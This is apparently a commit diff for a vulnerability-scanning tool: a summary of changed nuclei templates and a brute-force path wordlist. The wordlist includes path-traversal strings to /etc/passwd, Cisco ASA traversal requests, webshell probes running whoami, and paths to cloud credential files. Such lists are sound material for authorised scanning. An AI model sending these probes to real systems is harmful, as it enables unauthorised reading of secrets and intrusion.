.../cves/2021/CVE-2021-24291.yaml | 2 +- .../cves/2021/CVE-2021-24298.yaml | 2 +- .../cves/2021/CVE-2021-24300.yaml | 2 +- .../cves/2021/CVE-2021-24316.yaml | 2 +- .../cves/2021/CVE-2021-24320.yaml | 2 +- .../cves/2021/CVE-2021-24335.yaml | 2 +- .../cves/2021/CVE-2021-24340.yaml | 2 +- .../cves/2021/CVE-2021-24342.yaml | 2 +- .../cves/2021/CVE-2021-24358.yaml | 2 +- .../cves/2021/CVE-2021-24364.yaml | 2 +- .../cves/2021/CVE-2021-24370.yaml | 2 +- .../cves/2021/CVE-2021-24387.yaml | 2 +- .../cves/2021/CVE-2021-24389.yaml | 2 +- .../cves/2021/CVE-2021-24406.yaml | 2 +- .../cves/2021/CVE-2021-24407.yaml | 2 +- .../cves/2021/CVE-2021-24472.yaml | 2 +- .../cves/2021/CVE-2021-24488.yaml | 2 +- .../cves/2021/CVE-2021-24495.yaml | 2 +- .../cves/2021/CVE-2021-24498.yaml | 2 +- .../cves/2021/CVE-2021-24499.yaml | 2 +- .../cves/2021/CVE-2021-24510.yaml | 2 +- .../cves/2021/CVE-2021-24746.yaml | 2 +- .../cves/2021/CVE-2021-24750.yaml | 2 +- .../cves/2021/CVE-2021-24762.yaml | 2 +- .../cves/2021/CVE-2021-24838.yaml | 2 +- .../cves/2021/CVE-2021-24891.yaml | 2 +- .../cves/2021/CVE-2021-24910.yaml | 2 +- .../cves/2021/CVE-2021-24926.yaml | 2 +- .../cves/2021/CVE-2021-24947.yaml | 2 +- .../cves/2021/CVE-2021-24987.yaml | 2 +- .../cves/2021/CVE-2021-24991.yaml | 2 +- .../cves/2021/CVE-2021-24997.yaml | 2 +- .../cves/2021/CVE-2021-25008.yaml | 2 +- .../cves/2021/CVE-2021-25028.yaml | 2 +- .../cves/2021/CVE-2021-25033.yaml | 2 +- .../cves/2021/CVE-2021-25052.yaml | 2 +- .../cves/2021/CVE-2021-25055.yaml | 2 +- .../cves/2021/CVE-2021-25063.yaml | 2 +- .../cves/2021/CVE-2021-25074.yaml | 2 +- .../cves/2021/CVE-2021-25075.yaml | 2 +- .../cves/2021/CVE-2021-25085.yaml | 2 +- .../cves/2021/CVE-2021-25111.yaml | 2 +- .../cves/2021/CVE-2021-25112.yaml | 2 +- .../cves/2021/CVE-2021-25118.yaml | 2 +- .../cves/2021/CVE-2021-25120.yaml | 2 +- .../cves/2021/CVE-2021-26085.yaml | 2 +- .../cves/2021/CVE-2021-26086.yaml | 2 +- .../cves/2021/CVE-2021-26295.yaml | 2 +- .../cves/2021/CVE-2021-26598.yaml | 2 +- .../cves/2021/CVE-2021-26723.yaml | 2 +- .../cves/2021/CVE-2021-27330.yaml | 2 +- .../cves/2021/CVE-2021-27519.yaml | 2 +- .../cves/2021/CVE-2021-28164.yaml | 2 +- .../cves/2021/CVE-2021-29203.yaml | 2 +- .../cves/2021/CVE-2021-3129.yaml | 2 +- .../cves/2021/CVE-2021-31537.yaml | 2 +- .../cves/2021/CVE-2021-31589.yaml | 2 +- .../cves/2021/CVE-2021-31602.yaml | 2 +- .../cves/2021/CVE-2021-32305.yaml | 2 +- .../cves/2021/CVE-2021-32789.yaml | 2 +- .../cves/2021/CVE-2021-33044.yaml | 2 +- .../cves/2021/CVE-2021-33221.yaml | 2 +- .../cves/2021/CVE-2021-3378.yaml | 2 +- .../cves/2021/CVE-2021-33904.yaml | 2 +- .../cves/2021/CVE-2021-34370.yaml | 2 +- .../cves/2021/CVE-2021-34621.yaml | 2 +- .../cves/2021/CVE-2021-34640.yaml | 2 +- .../cves/2021/CVE-2021-34643.yaml | 2 +- .../cves/2021/CVE-2021-34805.yaml | 2 +- .../cves/2021/CVE-2021-35464.yaml | 2 +- .../cves/2021/CVE-2021-36356.yaml | 2 +- .../cves/2021/CVE-2021-3654.yaml | 2 +- .../cves/2021/CVE-2021-37573.yaml | 2 +- .../cves/2021/CVE-2021-38702.yaml | 2 +- .../cves/2021/CVE-2021-39226.yaml | 2 +- .../cves/2021/CVE-2021-39312.yaml | 2 +- .../cves/2021/CVE-2021-39316.yaml | 2 +- .../cves/2021/CVE-2021-39320.yaml | 2 +- .../cves/2021/CVE-2021-39322.yaml | 2 +- .../cves/2021/CVE-2021-39327.yaml | 2 +- .../cves/2021/CVE-2021-39350.yaml | 2 +- .../cves/2021/CVE-2021-40856.yaml | 2 +- .../cves/2021/CVE-2021-40868.yaml | 2 +- .../cves/2021/CVE-2021-41192.yaml | 2 +- .../cves/2021/CVE-2021-41691.yaml | 2 +- .../cves/2021/CVE-2021-41773.yaml | 2 +- .../cves/2021/CVE-2021-41826.yaml | 2 +- .../cves/2021/CVE-2021-42013.yaml | 2 +- .../cves/2021/CVE-2021-42063.yaml | 2 +- .../cves/2021/CVE-2021-42071.yaml | 2 +- .../cves/2021/CVE-2021-42192.yaml | 2 +- .../cves/2021/CVE-2021-43062.yaml | 2 +- .../cves/2021/CVE-2021-44077.yaml | 2 +- .../cves/2021/CVE-2021-44152.yaml | 2 +- .../cves/2021/CVE-2021-44528.yaml | 2 +- .../cves/2021/CVE-2021-44848.yaml | 2 +- .../cves/2021/CVE-2021-45043.yaml | 2 +- .../cves/2021/CVE-2021-45092.yaml | 2 +- .../cves/2021/CVE-2021-45422.yaml | 2 +- .../cves/2021/CVE-2021-45428.yaml | 2 +- .../cves/2021/CVE-2021-46005.yaml | 2 +- .../cves/2021/CVE-2021-46387.yaml | 2 +- .../cves/2021/CVE-2021-46417.yaml | 2 +- .../cves/2021/CVE-2021-46422.yaml | 2 +- .../cves/2021/CVE-2021-46424.yaml | 2 +- .../cves/2022/CVE-2022-0140.yaml | 2 +- .../cves/2022/CVE-2022-0148.yaml | 2 +- .../cves/2022/CVE-2022-0149.yaml | 2 +- .../cves/2022/CVE-2022-0150.yaml | 2 +- .../cves/2022/CVE-2022-0165.yaml | 2 +- .../cves/2022/CVE-2022-0189.yaml | 2 +- .../cves/2022/CVE-2022-0201.yaml | 2 +- .../cves/2022/CVE-2022-0208.yaml | 2 +- .../cves/2022/CVE-2022-0220.yaml | 2 +- .../cves/2022/CVE-2022-0271.yaml | 2 +- .../cves/2022/CVE-2022-0281.yaml | 2 +- .../cves/2022/CVE-2022-0288.yaml | 2 +- .../cves/2022/CVE-2022-0346.yaml | 2 +- .../cves/2022/CVE-2022-0378.yaml | 2 +- .../cves/2022/CVE-2022-0422.yaml | 2 +- .../cves/2022/CVE-2022-0432.yaml | 2 +- .../cves/2022/CVE-2022-0437.yaml | 2 +- .../cves/2022/CVE-2022-0482.yaml | 2 +- .../cves/2022/CVE-2022-0591.yaml | 2 +- .../cves/2022/CVE-2022-0594.yaml | 2 +- .../cves/2022/CVE-2022-0595.yaml | 2 +- .../cves/2022/CVE-2022-0599.yaml | 2 +- .../cves/2022/CVE-2022-0656.yaml | 2 +- .../cves/2022/CVE-2022-0660.yaml | 2 +- .../cves/2022/CVE-2022-0692.yaml | 2 +- .../cves/2022/CVE-2022-0776.yaml | 2 +- .../cves/2022/CVE-2022-0870.yaml | 2 +- .../cves/2022/CVE-2022-0928.yaml | 2 +- .../cves/2022/CVE-2022-0952.yaml | 2 +- .../cves/2022/CVE-2022-0954.yaml | 2 +- .../cves/2022/CVE-2022-0963.yaml | 2 +- .../cves/2022/CVE-2022-0968.yaml | 2 +- .../cves/2022/CVE-2022-1020.yaml | 2 +- .../cves/2022/CVE-2022-1040.yaml | 2 +- .../cves/2022/CVE-2022-1054.yaml | 2 +- .../cves/2022/CVE-2022-1119.yaml | 2 +- .../cves/2022/CVE-2022-1221.yaml | 2 +- .../cves/2022/CVE-2022-1386.yaml | 2 +- .../cves/2022/CVE-2022-1390.yaml | 2 +- .../cves/2022/CVE-2022-1391.yaml | 2 +- .../cves/2022/CVE-2022-1392.yaml | 2 +- .../cves/2022/CVE-2022-1439.yaml | 2 +- .../cves/2022/CVE-2022-1597.yaml | 2 +- .../cves/2022/CVE-2022-1598.yaml | 2 +- .../cves/2022/CVE-2022-1609.yaml | 2 +- .../cves/2022/CVE-2022-1713.yaml | 2 +- .../cves/2022/CVE-2022-1724.yaml | 2 +- .../cves/2022/CVE-2022-1815.yaml | 2 +- .../cves/2022/CVE-2022-1904.yaml | 2 +- .../cves/2022/CVE-2022-1906.yaml | 2 +- .../cves/2022/CVE-2022-1937.yaml | 2 +- .../cves/2022/CVE-2022-1946.yaml | 2 +- .../cves/2022/CVE-2022-2187.yaml | 2 +- .../cves/2022/CVE-2022-2290.yaml | 2 +- .../cves/2022/CVE-2022-22954.yaml | 2 +- .../cves/2022/CVE-2022-22963.yaml | 2 +- .../cves/2022/CVE-2022-24112.yaml | 4 +- .../cves/2022/CVE-2022-24124.yaml | 2 +- .../cves/2022/CVE-2022-24181.yaml | 2 +- .../cves/2022/CVE-2022-24856.yaml | 2 +- .../cves/2022/CVE-2022-24899.yaml | 2 +- .../cves/2022/CVE-2022-25216.yaml | 2 +- .../cves/2022/CVE-2022-26138.yaml | 3 + .../cves/2022/CVE-2022-26233.yaml | 2 +- .../cves/2022/CVE-2022-26352.yaml | 2 +- .../cves/2022/CVE-2022-27927.yaml | 2 +- .../cves/2022/CVE-2022-28080.yaml | 2 +- .../cves/2022/CVE-2022-28363.yaml | 2 +- .../cves/2022/CVE-2022-28365.yaml | 2 +- .../cves/2022/CVE-2022-29014.yaml | 2 +- .../cves/2022/CVE-2022-29298.yaml | 2 +- .../cves/2022/CVE-2022-29299.yaml | 2 +- .../cves/2022/CVE-2022-29301.yaml | 2 +- .../cves/2022/CVE-2022-29303.yaml | 2 +- .../cves/2022/CVE-2022-30525.yaml | 2 +- .../cves/2022/CVE-2022-31126.yaml | 2 +- .../cves/2022/CVE-2022-31269.yaml | 6 +- .../cves/2022/CVE-2022-31798.yaml | 6 +- .../cves/2022/CVE-2022-34046.yaml | 2 +- .../cves/2022/CVE-2022-34047.yaml | 2 +- .../cves/2022/CVE-2022-34048.yaml | 2 +- .../cves/2022/CVE-2022-37042.yaml | 5 + .../cves/2022/CVE-2022-37153.yaml | 5 +- .../cves/2022/CVE-2022-38463.yaml | 38 + .../UCMDB/ucmdb-default-login.yaml | 2 +- .../cobbler/cobbler-default-login.yaml | 2 +- .../weblogic/weblogic-weak-login.yaml | 2 +- .../exposed-panels/3g-wireless-gateway.yaml | 2 +- .../adobe/adobe-component-login.yaml | 2 +- .../exposed-panels/advance-setup.yaml | 2 +- .../exposed-panels/amcrest-login.yaml | 2 +- .../exposed-panels/atvise-login.yaml | 2 +- .../avatier-password-management.yaml | 2 +- .../exposed-panels/blue-iris-login.yaml | 2 +- .../cisco/cisco-finesse-login.yaml | 2 +- .../cisco/cisco-integrated-login.yaml | 2 +- .../cisco/cisco-meraki-exposure.yaml | 2 +- .../exposed-panels/cloudphysician-radar.yaml | 2 +- .../exposed-panels/crush-ftp-login.yaml | 2 +- .../exposed-panels/d-link-wireless.yaml | 2 +- .../exposed-panels/dericam-login.yaml | 2 +- .../exposed-panels/epson-access-detect.yaml | 2 +- .../epson-web-control-detect.yaml | 2 +- .../exposed-panels/fiori-launchpad.yaml | 2 +- .../exposed-panels/fiorilaunchpad-logon.yaml | 2 +- .../exposed-panels/gargoyle-router.yaml | 2 +- .../exposed-panels/glpi-login.yaml | 2 +- .../honeywell-web-controller.yaml | 2 +- .../honeywell-xl-web-controller.yaml | 2 +- .../exposed-panels/ibm/ibm-note-login.yaml | 2 +- .../exposed-panels/intelbras-login.yaml | 2 +- .../exposed-panels/jfrog.yaml | 2 +- .../exposed-panels/jupyter-notebook.yaml | 2 +- .../exposed-panels/keenetic-web-login.yaml | 2 +- .../exposed-panels/lacie-panel.yaml | 2 +- .../exposed-panels/mini-start-page.yaml | 2 +- .../exposed-panels/netscaler-aaa-login.yaml | 2 +- .../exposed-panels/oki-data.yaml | 2 +- .../exposed-panels/olt-web-interface.yaml | 2 +- .../exposed-panels/open-game-panel.yaml | 2 +- .../open-stack-dashboard-login.yaml | 2 +- .../exposed-panels/opennms-web-console.yaml | 2 +- .../exposed-panels/pandora-fms-console.yaml | 2 +- .../exposed-panels/plesk-obsidian.yaml | 2 +- .../exposed-panels/plesk-onyx.yaml | 2 +- .../exposed-panels/polycom-login.yaml | 2 +- .../exposed-panels/powerlogic-ion.yaml | 2 +- .../exposed-panels/project-insight-login.yaml | 2 +- .../exposed-panels/projectsend-login.yaml | 2 +- .../exposed-panels/radius-manager.yaml | 2 +- .../exposed-panels/remote-ui-login.yaml | 2 +- .../exposed-panels/saferoads-vms-login.yaml | 2 +- .../exposed-panels/sauter-login.yaml | 2 +- .../exposed-panels/server-backup-login.yaml | 2 +- .../exposed-panels/sharecenter-login.yaml | 2 +- .../exposed-panels/sitefinity-login.yaml | 2 +- .../exposed-panels/siteomat-login.yaml | 2 +- .../exposed-panels/sphider-login.yaml | 2 +- .../exposed-panels/squirrelmail-login.yaml | 2 +- .../exposed-panels/syncthru-web-service.yaml | 2 +- .../exposed-panels/teltonika-login.yaml | 2 +- .../exposed-panels/total-web.yaml | 2 +- .../tuxedo-connected-controller.yaml | 2 +- .../exposed-panels/vigor-login.yaml | 2 +- .../exposed-panels/vmware-horizon-panel.yaml | 2 +- .../exposed-panels/watchguard-panel.yaml | 2 +- .../exposed-panels/weatherlink.yaml | 2 +- .../exposed-panels/web-local-craft.yaml | 2 +- .../exposed-panels/web-service-panel.yaml | 2 +- .../exposed-panels/weblogic-uddiexplorer.yaml | 2 +- .../exposed-panels/webmodule-ee-panel.yaml | 2 +- .../exposed-panels/whm-login-detect.yaml | 2 +- .../wso2-management-console.yaml | 2 +- .../exposed-panels/xenmobile-login.yaml | 2 +- .../exposed-panels/zimbra-web-client.yaml | 2 +- .../backups/exposed-mysql-initial.yaml | 2 +- .../configs/cisco-network-config.yaml | 2 +- .../configs/exposed-authentication-asmx.yaml | 2 +- .../exposures/configs/exposed-gitignore.yaml | 2 +- .../configs/exposed-sharepoint-list.yaml | 2 +- .../configs/honeywell-scada-config.yaml | 2 +- .../exposures/configs/nagios-status-page.yaml | 2 +- .../exposures/configs/prometheus-metrics.yaml | 2 +- .../exposures/configs/qdpm-info-leak.yaml | 2 +- .../configs/saia-web-server-info.yaml | 2 +- .../exposures/files/joomla-file-listing.yaml | 2 +- .../exposures/files/redmine-config.yaml | 2 +- .../files/sensitive-storage-exposure.yaml | 2 +- .../exposures/logs/fastcgi-echo.yaml | 2 +- .../exposures/logs/struts-problem-report.yaml | 2 +- .../fuzzing/iis-shortname.yaml | 2 +- .../iot/automation-direct.yaml | 2 +- .../iot/codian-mcu-login.yaml | 2 +- config/nuclei-templates/iot/contacam.yaml | 2 +- .../iot/envision-gateway.yaml | 2 +- config/nuclei-templates/iot/epmp-login.yaml | 2 +- .../iot/heatmiser-wifi-thermostat.yaml | 2 +- .../iot/hp-laserjet-detect.yaml | 2 +- .../iot/internet-service.yaml | 2 +- .../iot/liveview-axis-camera.yaml | 2 +- .../iot/mobotix-guest-camera.yaml | 2 +- .../iot/netsurveillance-web.yaml | 2 +- .../nuclei-templates/iot/novus-ip-camera.yaml | 2 +- .../iot/nuuno-network-login.yaml | 2 +- .../iot/panasonic-network-management.yaml | 2 +- config/nuclei-templates/iot/webcamxp-5.yaml | 2 +- .../adobe-connect-username-exposure.yaml | 2 +- .../aem/aem-groovyconsole.yaml | 2 +- .../apache/apache-filename-enum.yaml | 2 +- .../etcd-unauthenticated-api.yaml | 2 +- .../exposed-jquery-file-upload.yaml | 2 +- .../exposed-sqlite-manager.yaml | 2 +- .../misconfiguration/haproxy-status.yaml | 2 +- .../misconfiguration/jboss-status.yaml | 2 +- .../openbmcs/openbmcs-secret-disclosure.yaml | 2 +- .../openbmcs/openbmcs-ssrf.yaml | 2 +- .../phpmyadmin/phpmyadmin-sql.php-server.yaml | 2 +- .../roxyfileman-fileupload.yaml | 2 +- .../misconfiguration/service-pwd.yaml | 2 +- .../solr-query-dashboard.yaml | 2 +- .../misconfiguration/tcpconfig.yaml | 2 +- .../unauthenticated-mongo-express.yaml | 2 +- .../unauthenticated-popup-upload.yaml | 2 +- .../unauthenticated-prtg.yaml | 2 +- .../unauthenticated-varnish-cache-purge.yaml | 2 +- .../misconfiguration/ups-status.yaml | 2 +- .../zabbix-dashboards-access.yaml | 2 +- .../network/cowrie-honeypot-detect.yaml | 2 +- .../network/openssh-detection.yaml | 2 +- .../takeovers/gitbook-takeover.yaml | 2 +- .../technologies/detect-sentry.yaml | 2 +- .../technologies/projectsend-detect.yaml | 2 +- .../technologies/synology-web-station.yaml | 2 +- .../technologies/tileserver-gl.yaml | 2 +- .../cisco/cisco-vmanage-log4j.yaml | 2 +- .../concrete/concrete-xss.yaml | 2 +- .../drupal/drupal-avatar-xss.yaml | 2 +- .../fastjson/fastjson-1-2-24-rce.yaml | 2 +- .../fastjson/fastjson-1-2-47-rce.yaml | 2 +- .../generic/xmlrpc-pingback-ssrf.yaml | 2 +- .../vulnerabilities/gitlab/gitlab-rce.yaml | 9 +- .../gnuboard/gnuboard5-rxss.yaml | 2 +- .../gnuboard/gnuboard5-xss.yaml | 2 +- .../ibm/ibm-infoprint-lfi.yaml | 2 +- .../jenkins/jenkins-script.yaml | 2 +- .../jenkins/jenkins-stack-trace.yaml | 2 +- .../joomla/joomla-jvehicles-lfi.yaml | 2 +- .../mobileiron/mobileiron-log4j-jndi-rce.yaml | 12 +- .../moodle/moodle-filter-jmol-lfi.yaml | 2 +- .../netsweeper/netsweeper-open-redirect.yaml | 2 +- .../netsweeper/netsweeper-rxss.yaml | 2 +- .../oracle/oracle-siebel-xss.yaml | 2 +- .../oscommerce/oscommerce-rce.yaml | 2 +- .../other/alumni-management-sqli.yaml | 2 +- .../vulnerabilities/other/avada-xss.yaml | 2 +- .../vulnerabilities/other/bems-api-lfi.yaml | 2 +- .../other/beward-ipcamera-disclosure.yaml | 2 +- .../other/bitrix-open-redirect.yaml | 2 +- .../other/bullwark-momentum-lfi.yaml | 2 +- .../other/carel-bacnet-gateway-traversal.yaml | 2 +- .../vulnerabilities/other/carrental-xss.yaml | 2 +- .../other/caucho-resin-info-disclosure.yaml | 2 +- .../other/cisco-rv-series-rce.yaml | 10 +- .../other/commax-biometric-auth-bypass.yaml | 2 +- .../other/comtrend-password-exposure.yaml | 2 +- .../vulnerabilities/other/cvms-sqli.yaml | 2 +- .../vulnerabilities/other/devalcms-xss.yaml | 2 +- .../other/dicoogle-pacs-lfi.yaml | 2 +- .../other/dixell-xweb500-filewrite.yaml | 2 +- .../vulnerabilities/other/eibiz-lfi.yaml | 2 +- .../vulnerabilities/other/ems-sqli.yaml | 2 +- .../other/geovision-geowebserver-lfi.yaml | 2 +- .../other/geovision-geowebserver-xss.yaml | 2 +- .../vulnerabilities/other/gsoap-lfi.yaml | 2 +- .../other/hashicorp-consul-rce.yaml | 2 +- .../other/hasura-graphql-psql-exec.yaml | 2 +- .../other/hrsale-unauthenticated-lfi.yaml | 2 +- .../other/huawei-router-auth-bypass.yaml | 2 +- .../other/joomla-com-fabrik-lfi.yaml | 2 +- .../vulnerabilities/other/kavita-lfi.yaml | 2 +- .../other/kevinlab-bems-sqli.yaml | 2 +- .../other/kyocera-m2035dn-lfi.yaml | 2 +- .../other/laravel-filemanager-lfi.yaml | 2 +- .../vulnerabilities/other/loancms-sqli.yaml | 2 +- .../luftguitar-arbitrary-file-upload.yaml | 2 +- .../vulnerabilities/other/minimouse-lfi.yaml | 2 +- .../other/netgear-router-exposure.yaml | 2 +- .../other/netis-info-leak.yaml | 2 +- .../other/nuuo-file-inclusion.yaml | 2 +- .../other/nuuo-nvrmini2-rce.yaml | 2 +- .../other/oliver-library-lfi.yaml | 2 +- .../vulnerabilities/other/omnia-mpx-lfi.yaml | 2 +- .../other/onlinefarm-management-xss.yaml | 2 +- .../other/opennms-log4j-jndi-rce.yaml | 7 +- .../vulnerabilities/other/opensis-lfi.yaml | 2 +- .../other/optilink-ont1gew-gpon-rce.yaml | 2 +- .../other/oracle-fatwire-lfi.yaml | 2 +- .../other/orbiteam-bscw-server-lfi.yaml | 2 +- .../other/otobo-open-redirect.yaml | 2 +- .../other/parallels-hsphere-xss.yaml | 2 +- .../other/php-timeclock-xss.yaml | 2 +- .../vulnerabilities/other/phpwiki-lfi.yaml | 2 +- .../other/pmb-directory-traversal.yaml | 2 +- .../other/pmb-local-file-disclosure.yaml | 2 +- .../other/processmaker-lfi.yaml | 2 +- .../vulnerabilities/other/rconfig-rce.yaml | 2 +- .../vulnerabilities/other/rockmongo-xss.yaml | 2 +- .../vulnerabilities/other/sar2html-rce.yaml | 2 +- .../other/seowon-router-rce.yaml | 2 +- .../other/sofneta-mecdream-pacs-lfi.yaml | 2 +- .../other/solar-log-authbypass.yaml | 2 +- .../other/spark-webui-unauth.yaml | 2 +- .../other/surrealtodo-lfi.yaml | 2 +- .../other/tikiwiki-json-rpc.yaml | 2 +- .../other/umbraco-base-ssrf.yaml | 2 +- .../other/vanguard-post-xss.yaml | 2 +- .../other/vpms-auth-bypass.yaml | 2 +- .../watchguard-credentials-disclosure.yaml | 2 +- .../vulnerabilities/other/webui-rce.yaml | 2 +- .../other/wems-manager-xss.yaml | 2 +- .../vulnerabilities/other/xerox-efi-lfi.yaml | 2 +- .../vulnerabilities/other/yeswiki-sql.yaml | 2 +- .../other/yeswiki-stored-xss.yaml | 2 +- .../vulnerabilities/other/yeswiki-xss.yaml | 2 +- .../vulnerabilities/other/yishaadmin-lfi.yaml | 2 +- .../other/zimbra-preauth-ssrf.yaml | 7 +- .../other/zms-auth-bypass.yaml | 2 +- .../vulnerabilities/other/zms-sqli.yaml | 2 +- .../vulnerabilities/rails/rails6-xss.yaml | 2 +- .../royalevent/royalevent-stored-xss.yaml | 2 +- .../ruijie/ruijie-networks-lfi.yaml | 2 +- .../samsung/samsung-wlan-ap-xss.yaml | 2 +- .../simplecrm/simple-crm-sql-injection.yaml | 2 +- .../springboot/springboot-log4j-rce.yaml | 7 +- .../squirrelmail/squirrelmail-add-xss.yaml | 2 +- .../squirrelmail/squirrelmail-lfi.yaml | 2 +- .../squirrelmail-vkeyboard-xss.yaml | 2 +- .../thinkphp-509-information-disclosure.yaml | 2 +- .../wordpress/404-to-301-xss.yaml | 2 +- .../wordpress/CVE-2019-10692.yaml | 36 +- .../wordpress/ad-widget-lfi.yaml | 2 +- .../advanced-access-manager-lfi.yaml | 2 +- .../wordpress/age-gate-open-redirect.yaml | 2 +- .../wordpress/ait-csv-import-export-rce.yaml | 2 +- .../wordpress/amministrazione-aperta-lfi.yaml | 2 +- .../wordpress/analytify-plugin-xss.yaml | 2 +- .../wordpress/aspose-file-download.yaml | 2 +- .../wordpress/aspose-ie-file-download.yaml | 2 +- .../wordpress/aspose-pdf-file-download.yaml | 2 +- .../wordpress/aspose-words-file-download.yaml | 2 +- .../wordpress/avchat-video-chat-xss.yaml | 2 +- .../wordpress/brandfolder-lfi.yaml | 2 +- .../wordpress/brandfolder-open-redirect.yaml | 2 +- .../wordpress/calameo-publications-xss.yaml | 2 +- .../checkout-fields-manager-xss.yaml | 2 +- .../wordpress/cherry-file-download.yaml | 2 +- .../vulnerabilities/wordpress/cherry-lfi.yaml | 2 +- .../wordpress/church-admin-lfi.yaml | 2 +- .../wordpress/churchope-lfi.yaml | 2 +- .../wordpress/clearfy-cache-xss.yaml | 2 +- .../vulnerabilities/wordpress/curcy-xss.yaml | 2 +- .../wordpress/diarise-theme-lfi.yaml | 2 +- .../wordpress/elex-woocommerce-xss.yaml | 2 +- .../flow-flow-social-stream-xss.yaml | 2 +- .../wordpress/hb-audio-lfi.yaml | 2 +- .../wordpress/health-check-lfi.yaml | 2 +- .../wordpress/members-list-xss.yaml | 2 +- .../wordpress/modula-image-gallery-xss.yaml | 2 +- .../wordpress/mthemeunus-lfi.yaml | 2 +- .../wordpress/music-store-open-redirect.yaml | 2 +- .../wordpress/my-chatbot-xss.yaml | 2 +- .../wordpress/nativechurch-wp-theme-lfd.yaml | 2 +- .../wordpress/new-user-approve-xss.yaml | 2 +- .../wordpress/newsletter-open-redirect.yaml | 2 +- .../wordpress/pieregister-open-redirect.yaml | 2 +- .../wordpress/sassy-social-share.yaml | 2 +- .../wordpress/seo-redirection-xss.yaml | 2 +- .../wordpress/shortcode-lfi.yaml | 2 +- .../shortpixel-image-optimizer-xss.yaml | 2 +- .../ultimatemember-open-redirect.yaml | 2 +- .../woocommerce-pdf-invoices-xss.yaml | 2 +- .../wordpress-bbpress-plugin-listing.yaml | 2 +- .../wordpress-elementor-plugin-listing.yaml | 2 +- .../wordpress/wordpress-git-config.yaml | 2 +- .../wordpress-gtranslate-plugin-listing.yaml | 2 +- .../wordpress-rce-simplefilelist.yaml | 2 +- .../wordpress-redirection-plugin-listing.yaml | 2 +- .../wordpress-social-metrics-tracker.yaml | 2 +- ...ordpress-total-upkeep-backup-download.yaml | 2 +- .../wordpress-updraftplus-pem-key.yaml | 2 +- .../wordpress-woocommerce-listing.yaml | 2 +- .../wordpress/wordpress-wordfence-lfi.yaml | 2 +- .../wordpress/wordpress-zebra-form-xss.yaml | 2 +- .../wp-123contactform-plugin-listing.yaml | 2 +- .../wordpress/wp-adaptive-xss.yaml | 2 +- .../wordpress/wp-all-export-xss.yaml | 2 +- .../wordpress/wp-ambience-xss.yaml | 2 +- .../wordpress/wp-arforms-listing.yaml | 2 +- .../wordpress/wp-custom-tables-xss.yaml | 2 +- .../wp-email-subscribers-listing.yaml | 2 +- .../wordpress/wp-finder-xss.yaml | 2 +- .../wordpress/wp-flagem-xss.yaml | 2 +- .../wordpress/wp-grimag-open-redirect.yaml | 2 +- .../wp-idx-broker-platinum-listing.yaml | 2 +- .../wordpress/wp-insert-php-xss.yaml | 2 +- .../wordpress/wp-iwp-client-listing.yaml | 2 +- .../wordpress/wp-javospot-lfi.yaml | 2 +- .../wp-memphis-documents-library-lfi.yaml | 2 +- .../wordpress/wp-multiple-theme-ssrf.yaml | 2 +- .../wordpress/wp-plugin-lifterlms.yaml | 2 +- .../wordpress/wp-plugin-utlimate-member.yaml | 2 +- .../wordpress/wp-prostore-open-redirect.yaml | 2 +- .../wordpress/wp-security-open-redirect.yaml | 2 +- .../wordpress/wp-sfwd-lms-listing.yaml | 2 +- .../wordpress/wp-simple-fields-lfi.yaml | 2 +- .../wordpress/wp-slideshow-xss.yaml | 2 +- .../wordpress/wp-socialfit-xss.yaml | 2 +- .../wordpress/wp-spot-premium-lfi.yaml | 2 +- .../wordpress/wp-super-forms.yaml | 2 +- .../wordpress/wp-tutor-lfi.yaml | 2 +- .../wordpress/wp-under-construction-ssrf.yaml | 2 +- .../wordpress/wp-vault-lfi.yaml | 2 +- .../wp-woocommerce-email-verification.yaml | 2 +- .../wordpress/wpdm-cache-session.yaml | 2 +- .../wordpress/wpify-woo-czech-xss.yaml | 2 +- .../wordpress/wpmudev-pub-keys.yaml | 2 +- lib/util/kvDb.go | 3 + pkg/hydra/memcached/crkmmc.go | 26 + 1063 files changed, 5943 insertions(+), 1096 deletions(-) create mode 100644 config/nuclei-templates/cves/2022/CVE-2022-38463.yaml create mode 100644 pkg/hydra/memcached/crkmmc.go diff --git a/brute/dicts/filedic.txt b/brute/dicts/filedic.txt index c96790da6..cbc9e9fd6 100644 --- a/brute/dicts/filedic.txt +++ b/brute/dicts/filedic.txt @@ -1,15 +1,33 @@ -/fs/var/run/secrets/kubernetes.io/serviceaccount/token +!.gitignore !.htaccess !.htpasswd ".t.jsp %20../ %2e%2e//google.com +%2e%2e;/test %2e%2e;test/ %3f/ %C0%AE%C0%AE%C0%AF +%EXT% +%EXT%.bak +%EXT%.old +%EXT%.php +%EXT%.tar +%EXT%.tgz +%EXT%.txt +%EXT%.zip +%ff %ff/ ++CSCOE+/logon.html ++CSCOE+/session_password.html ++CSCOT+/oem ++CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua ++CSCOT+/translation ++CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ +.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd ..;/ ./servlet/Cat?pwd=023&cmd=whoami +.0 .1ndex.jsp .46_o01561023045980.jsp .46_sjn4gwl3l191.jsp @@ -25,7 +43,9 @@ .DS_Store .FBCIndex .HTF/ +.ICEauthority .JustCode +.LICENSE.bud .LOCAL .LSOverride .O01551922179807.jsp @@ -46,223 +66,556 @@ .O01561023045980.jsp .O01561023045980.jsp?cmd=whoami&ls=whoami .O015610230459up.jsp +.PDF .Python .RData +.README.md.bud .Rapp.history +.Rbuildignore .Rhistory +.Rprofile .Rproj.user/ +.SRCINFO .SyncID .SyncIgnore .Trash .Trashes .UnoThis.jsp .UnoThis.jsp?cmd=whoami +.Xauthority +.Xdefaults +.Xresources .Xt01.jsp .Xt01404.png .Xt01755.jsp ._.jsp ._com.jsp +.accdb .access +.ackrc +.action +.actionScriptProperties .addressbook .adm .admin +.admin/ +.agignore +.agilekeychain +.agilekeychain.zip +.aliases +.all-contributorsrc +.analysis_options +.angular-cli.json +.ansible/ .apdisk +.apport-ignore.xml +.appveyor.yml .apt_generated/ +.arcconfig .architect +.arclint +.arcrc +.asa +.ashx +.asmx +.asp +.aspnet/DataProtection-Keys/ +.aspx +.atfp_history +.atom/config.cson +.atoum.php +.autotest +.autotools +.aws/ +.aws/config .aws/credentials +.axd .axoCover/ +.azure-pipelines.yml +.azure/accessTokens.json +.babel.json .babelrc +.babelrc.cjs +.babelrc.js .backup +.badarg.log +.badsegment.log .bak .bak.jsp +.bak_0.log +.bash_aliases .bash_history .bash_logout .bash_profile +.bash_prompt .bashrc .beamarker.dat.jsp +.binstar.yml +.bithoundrc +.blg 